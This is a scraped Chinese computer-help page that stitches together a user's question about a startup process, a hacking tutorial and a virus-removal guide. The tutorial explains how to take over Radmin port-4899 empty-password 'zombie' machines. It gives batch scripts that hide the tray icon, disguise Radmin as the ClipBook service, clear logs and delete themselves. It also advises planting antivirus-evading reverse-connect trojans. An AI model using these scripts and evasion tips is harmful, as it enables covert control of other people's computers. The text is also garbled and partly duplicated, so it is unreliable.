幼教 | 试题 | 电脑 | 作文 | 常识 | 加入收藏 | 网站地图

您当前位置:多思学习网知识频道电脑学习软件知识系统启动时加载的程序

系统启动时加载的程序

11-27 21:30:39软件知识
浏览次数:810次 
标签:电脑软件知识,软件基础知识,电脑入门,http://www.duosi8.com 系统启动时加载的程序,
很是奇怪,我启动系统的时候,一进windows视窗的时候,马上开任务管理器,会看到一个baby.exe的程序闪一下就没了,搜索文件(包括隐藏文件和系统文件)没有发现有次程序用任何看开机启动项目的软件也都没发现有这个程序(注册表和msconfig里直接看开机项目也没有),用了AVG Anti-Spyware和卡巴扫描系统分区也没有发现任何病毒和木马.但是就是每次开机,包括重启,马上开任务管理器看就有此程序闪下就没. 有无高手告诉我该如何找出并且删除 4899肉鸡 对于4899肉鸡,相信大家都不会陌生吧。Radmin远程控制软件最大的优点就是功能齐全,便于操作,能够躲避一些软件的查杀。实在是居家旅行,杀人灭口,绝好武器。那么……有的朋友要问了多么好的宝马良驹在哪里可以找到啊?问的好,各大黑客网站均能下载,童叟无欺啊! 第一章 4899空口令肉鸡争夺战 4899空口令肉鸡是由一些超级菜鸟们用Windows NT/2000 自动攻击探测机对他感兴趣的某段IP细心的,无微不至的扫描孕育而生的~~~(鼓掌,有请我们今天的主角,4899空口令肉鸡隆重登场,哎呀,谁拿西红柿扔我?忒不讲公德呢?扔也不扔个红的,绿的怎么吃啊?) 既然4899空口令肉鸡这个多,那么偶就先从它的由来说起吧!Windows NT/2000 自动攻击 探测机 这款扫描软件不但集成了扫描器的特点,还添加了一些漏洞的利用功能。它能够对扫描出IIS溢出的,弱口令的和SA空口令的电脑上传并安装远程图形控制软件Radmin,即把R_Server.exe,AdmDll.dll和raddrv.dll这三个文件上传到其 电脑系统跟目录%systemroot%\system32子目录下,并行运行R_Server.exe可执行文件。由于远程上传的Radmin没有经过配置,因此在对方机子的任务栏里出现了Radmin 服务程序的托盘(如图1-1)。这样不就成个此地无银三百两,机器的主人一定能发现这个不正常的托盘。我想他第一个动作就是把鼠标移动到托盘位置,一点就显示出了有某某IP正在连接本机。如果是个只知道上网聊天的MM她第一个动作就是把网断了,逃过别人的控制再说。如果是个有经验的老鸟那么各位就要小心了,他会通过显示出的IP查到你的电脑或者你用来扫描的肉鸡,这样就大大的不妙了。所以了,这个托盘的隐藏是非常必要和急切的。 在做我们的工作之前,要做好一些准备活动。首先把4899空口令肉鸡设置上密码,在Radmin的CMD控件下输入命令r_ server.exe /port:520 /pass:hackbase /save /silence。有些同僚总是抱怨这个命令不好用,我看过他们出问题的动画。无论是在CMD命令下或者在"运行"下输入这个命令都是正确的,而他们出错的原因就是没有添加参数"/save"保存,和参数"/silence"后台安装。这样设置好连接端口和密码,同道中人就算用"4899空口令扫描器"扫到你做的肉鸡也晚了,偶已经添加过密码 了,而端口在肉鸡重起后能够修改成功。接下来我们就要把一个反弹木马 放到肉鸡上,以免对方是动态IP,肉鸡就飞掉了。这里我们可以用灰鸽子VIP或黑洞2004 这两个反弹木马都很不错的哦~~~。顺便说一句您的木马一定要做过特征码修改或者加壳啊,这样能够躲避对方杀毒软件的查杀。在这里再说句题外话对木马加壳不是加的壳越多就越安全的,这样大家就走入了多加壳的误区。这样不但不能躲过杀毒软件的查杀,还有可能使木马的功能受到影响。对喜欢加壳躲杀毒软件的朋友偶建议下先把木马脱壳,然后再加个不知名的壳(ASPack, UPX这些加壳软件的壳已经被有些杀毒软件列入黑客程序列表了),然后在用几款世面流行的杀毒软件在本地机器事先做个放杀毒检测。 这样的黑客程序才是我们的杀手锏。 前期工作制作完毕后,您就可以耐心的工作了。为了做到隐藏托盘的目的,偶想了两个办法: 第一, 在您的机器上事先安装并配置好Radmin,把注册表中的HKEY_LOCAL_MACHINE\SYSTEM\RAdmin导出为radmin.reg,这个就是绝对符合您意愿的Radmin配置,把radmin.reg上传到对方机器输入命令regedit /s radmin.reg。这样在机器重起或者您帮助他重起Radmin服务的时候,任务栏里的Radmin托盘就消失了。 第二, 写个批处理文件重新调整Radmin配置。批处理文件内容如下: @echo off @r_server.exe /port:520 /pass:hackbase /save /silence echo Windows Registry Editor Version 5.00 >ftp.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters] >>ftp.reg echo "DisableTrayIcon"=hex:01,00,00,00 >>ftp.reg regedit /s ftp.reg del ftp.reg 到这里菜鸟的"保鸡"反击战已经告一段落。刚才我们不是还放了个灰鸽子吗,这样这台肉鸡上就有我们的两匹宝马良驹了。小样让你跑,还是逃不出如来佛的掌心吧!呵呵,我得意的笑~~~ 在长期的摸索研究工作中,偶发现个Windows NT/2000 自动攻击探测机的小BUG。等偶慢慢道来,各位看官听仔细啊。Radmin 3.0影子版的客户端是Radmin公司开发的,而服务端程序缺因为种种原因,没有和各位见面。有的说是Radmin公司在开发新的功能,服务端没有开发完;有的说Radmin公司现在只对付费用户提供服务端,这些偶就不得而知了。可是我们敬爱的影子为我们制造出了"Radmin 3.0服务端"其本质就是2.0 版本的部分修改,对其图标做了修改和加壳处理。可是在汉化过程中,不知道什么原因,它在任务栏里的Radmin托盘变成了一个空白的地方,要是不注意是看不出来的(如图1-2、1-3)。所以了,我们在运行Windows NT/2000 自动攻击探测机扫描机子的时候,把它同目录下释放出来的R_Server.exe,替换成 3.0版本的R_Server.exe。这样扫描出来上传图形控制软件的机器,在其任务栏里就出现了一个空白的地方。当把鼠标点到上面的时候也没有了某某IP正在连接的提示,这样就欺骗了一些机主。呵呵,旁门左道大家不要见笑啊。可是这个小BUG启发了我的另一个思路,就是把我们的Radmin.exe自动运行的配置包重命名为R_Server.exe,然后替换掉R_Server.exe,我们不就有了所以自己的机子了吗?好,说干就干。把我的Radmin自解压包替换掉R_Server.exe,可是这回 Windows NT/2000 自动攻击探测机就没有了上传成功的小提示。(如图: 1-4)(广告过后更精彩)我一直对这个验证方法不甚了解,想找作者问问,可是他老人家还换QQ了。哪位高手有高见,请不吝赐教,偶的QQ:9500142。言归正传,那也难不倒我,我们把扫描出来有漏洞的所有IP复制到一个文本文件中,用superscan导入IP列表,扫描我设置Radmin服务的端口,这样被我上传Radmin的机器就都上门报道了。Yeah!(如图:1-5) 第二章 Radmin 服务端高级配置 既然我们对Radmin这么情有独钟,那么我们就要打造不死系的超级后门木马。具推断当前安装过 Radmin控制软件的肉鸡占安全性低级的电脑的80%左右,所以我们上传木马之前,要把其系统中可能存在的Radmin服务停止掉,替换成我们的服务为己所用。绝大部分的安装Radmin的肉鸡都是用的R_Server.exe程序。可是种植的原始情况分为两种: 第一 就如上面所说那样,是用Windows NT/2000 自动攻击探测机上传安装的,其安装服务的名称为"radmm"。启动和停止该服务的命令分别为"net start radmm"和"net stop radmm"。 第二 一些喜欢偷懒的朋友,把自己的Radmin是默认的R_Server.exe程序,其安装服务的名称为"Remote Administrator Service"。启动和停止该服务的命令分别为"net start r_server"和"net stop r_server"。 偶发现一个对付这两种配置的小窍门,就是可以用"r_server.exe /start"和"r_ server.exe /stop"启动和停止服务,然后我们在替换为自己的配置。 Follow Me! 对配置Radmin自解压程序的,我有两个思路可供大家参详,希望对您能配置能够有所启发和帮助. 第一 就是替换系统 服务的方法。如果您对Windows系统服务的工作机理不甚了解,那么请跳过这里,看接下来的第二种配置. 1、编写一个批处理文件,命名为 first.bat -------------------------------------------- @echo off r_server.exe /stop -------------------------------------------- 这样做是假定肉鸡上已经由黑友安装过Radmin服务,杀无赦。 2、接下来我拿系统的ClipBook服务开刀做下替换。编写一个批处理文件,命名为baby.bat -------------------------------------------- @echo off @sc stop ClipBook @sc delete ClipBook @sc stop r_server @del %systemroot%\system32\AdmDll.dll @del %systemroot%\system32\raddrv.dll @del %systemroot%\system32\R_Server.exe @del %systemroot%\system32\dllcache \ClipSrv.exe @del %systemroot%\system32\ClipSrv.exe @copy %systemroot%\system32\Setup\ClipSrv.exe %systemroot% \system32\ClipSrv.exe @copy %systemroot%\system32\Setup\raddrv.dll %systemroot%\system32\raddrv.dll @copy % systemroot%\system32\Setup\AdmDll.dll %systemroot%\system32\AdmDll.dll @ClipSrv.exe /install /silence @regedit /s radmin.reg @regedit /s server.reg @sc config ClipBook start=auto @sc start ClipBook @sc delete r_server @del radmin.reg @del server.reg @del sc.exe @clss.exe @cls @del baby.exe @shutdown.exe -f -r @del first.bat @del baby.bat @del clss.exe @del shutdown.exe -------------------------------------------- Radmin.reg 注册表文件时服务配置,Sc是微软服务修改程序(比尔其实对我们还满不错的哦,嘿嘿),clss.exe是日志清除工具(大家要养成勤扫地的习惯噢!),shutdown.exe是关机程序,这个程序无关紧要,关键看您的性子怎么样了(急性子的黑友建议使用)。Server.reg就是ClipBook服务的描述信息了,要伪装当然要做的够专业啊。 Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ClipSrv] "Description"="启用"剪贴簿查看器"储存信息并与远程计算机共享。如果此服务终止,"剪贴簿查看器" 将无法与远程计算机共享信息。如果此服务被禁用,任何依赖它的服务将无法启动。" "DisplayName"="ClipBook" 上面的信息是由原ClipBook服务 所对应的注册表键值 [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ClipSrv] 提取出来的。 因为分支包含了部分电脑路径和安全信息,每个电脑都有些许区别,所以把精炼的东西提取出来做为我们的伪装信息。 然后,把我们所用到的工具、注册表文件、批处理文件打包。配置RAR高级自解压格式所选项嘀时候,注意那个解压路径 写成%systemroot%\system32\Setup这个目录 直接看对oduxyym.exe病毒的手工清除方法: 最近出现了一种病毒,极其讨厌,通过映像劫持技术和双进程技术是机器几乎无法工作。大概现象为:   运行很多程序都无法启动,观察系统进程只是多了oduxyym.exe veckdld.exe两个进程。这时候,你就种病毒了,建议在进行修复操作前关闭其他所有的无关程序,断开网络连接,并建议将以下内容复制粘贴到记事本保存后以便操作。   首先:我们断开网络第一件事就是打开任务管理器,关闭多余的进程,XP一般只剩18个进程为正常,其他多余的所有进程需要关闭,oduxyym.exe veckdld.exe这两个进程关闭不了的时候,可以通过关闭EXPLROR .EXE后将看不到桌面,没关系,这时即可将oduxyym.exe veckdld.exe两个进程结束,然后再通过任务管理器的:文件-新建任务,打开C:\WINDOWS\EXPLROR.EXE,即可看到桌面,这时候就好办了,就是麻烦点。开始-运行:regedit回车,进入注册表:   [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RUN]将下列启动项删除: C:\WINDOWS\system32\.exe(默认,将此项清除即可) C:\WINDOWS\system32\oduxyym.exe(整字符串删除) C:\WINDOWS\system32\veckdld.exe(整字符串删除) C:\WINDOWS\system32\svpecld.exe(整字符串删除) 然后,看到启动项差不多干净之后,再查看映像劫持下面的东东   打开注册表的:[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options]下面查看所有的*.exe的所有项,如果右边的值为:C:\WINDOWS\system32\oduxyym.exe的,请将整项删除(你会发现会有很多很多,慢慢的操作,细心点,别误操作),做完上边的工作,你就可以重启机器了,重启后进安全模式,将下面的命令以记事本另存为.bat的文件,双击运行即可清理系统中的病毒文件。 然后,看到启动项差不多干净之后,再查看映像劫持下面的东东   打开注册表的:[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options]下面查看所有的*.exe的所有项,如果右边的值为:C:\WINDOWS\system32\oduxyym.exe的,请将整项删除(你会发现会有很多很多,慢慢的操作,细心点,别误操作),做完上边的工作,你就可以重启机器了,重启后进安全模式,的文件,双击运行即可清理系统中的病毒文件。 将上面的步骤做完后,重启机器,升级杀软全盘杀毒,卸载重新安装QQ ,下载Windows清理助手升级更新后清理系统: http://www.arswp.com/download/arswp/arswp.rar   另外,最近用USB设备传播的病毒越来越多,建议关闭自动播放功能,用一些工具进行免疫. 使用USB设备前先杀毒 下面是oduxyym病毒清除工具: 附件:oduxyym病毒清除.bat,系统启动时加载的程序
《系统启动时加载的程序》相关文章

tag: 软件知识,电脑软件知识,软件基础知识,电脑入门,电脑学习 - 软件知识

联系我们 | 网站地图 | 幼教大全 | 试题下载 | 电脑学习 | 加入收藏


幼儿园教案_ 教案模板_ 课件模板_ 教学反思_ 教学计划


多思学习网 1 2 3 4 5 6